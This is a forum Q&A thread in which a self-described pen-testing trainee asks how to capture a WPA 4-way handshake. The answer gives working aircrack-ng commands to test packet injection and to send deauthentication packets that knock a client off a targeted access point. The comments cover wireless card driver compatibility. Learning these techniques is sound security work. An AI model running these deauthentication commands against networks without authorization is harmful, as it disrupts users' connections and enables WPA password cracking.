1

I am training to be a pen tester and am having some issues obtaining a 4-way handshake. I use airodump-ng -c -w file --bssid wlo1 followed by aireplay-ng -0 0 -a (Mac) wlo1.

Here's all the steps I follow:

ifconfig wlo1
ifconfig wlo1 down
iwconfig wlo1 mode monitor
ifconfig wlo1 up
airmon-ng check wlo1
kill processes
airodump-ng wlo1
airodump-ng -c (channel) -w (file) --bssid wlo1
aireplay-ng -0 0 -a (mac) wlo1

I know what to do after I get the handshake; I am just stuck. Any help would be greatly appreciated. I am using Fedora 25.

1
  • I tried to keep my code nice and neat but it seems to smash it all together. I can send a screenshot if anyone is confused. Thank you! Commented May 27, 2017 at 1:09

1 Answer

1

First you have to make sure that your NIC can inject and that the targeted access point is in range.

aireplay-ng -9 wlo1 

After running this command you should see 'Injection is working!' and the targeted AP with a high response rate (50 - 100%).

A deauthentication attack sends disassociate packets to connected clients, so you need to have at least one associated client.

airodump-ng -c <ap channel> --bssid <ap mac> wlo1 

There should be at least one MAC under the 'STATION' tab associated with the AP. You can use this client for a targeted attack.

aireplay-ng -0 5 -a <ap mac> -c <client mac> wlo1 

You may have to run the above command several times until you get a handshake.

You can increase or decrease the number of deauthentication packets. Sometimes one is enough, sometimes it takes ten or more. If you still can't capture a WPA handshake then maybe the issue is with your NIC. Here you'll find a list of compatible drivers, and a patching guide.

4
  • When I run that injection test I see where it is attempting to broadcast probe requests. After that there's "no answer". It comes back saying found 6 APs but they all come back at 0%. Is there a driver I can download or do I need to get an external wireless card? Commented May 27, 2017 at 19:11
  • That means that your interface can't inject. Are you sure it's wlo1 and not mon0 or wlo1mon? If you run airmon-ng start wlo1 you will see "monitor mode is enabled on ...". Use that interface. If you still can't inject, here you'll find a list of compatible drivers: compatibility_drivers, and a patching guide: patching Commented May 27, 2017 at 20:00
  • Yeah it's definitely wlo1. I can see that it's in monitor mode once I switch from promiscuous mode. Thanks for the drivers guide, I really appreciate it!! Commented May 27, 2017 at 21:05
  • Turns out my wireless card is not compatible so I ordered the Alfa-AWUS036H-802-11b-Wireless-network/dp/B002WCEWU8. Thanks for your help Commented May 29, 2017 at 8:36
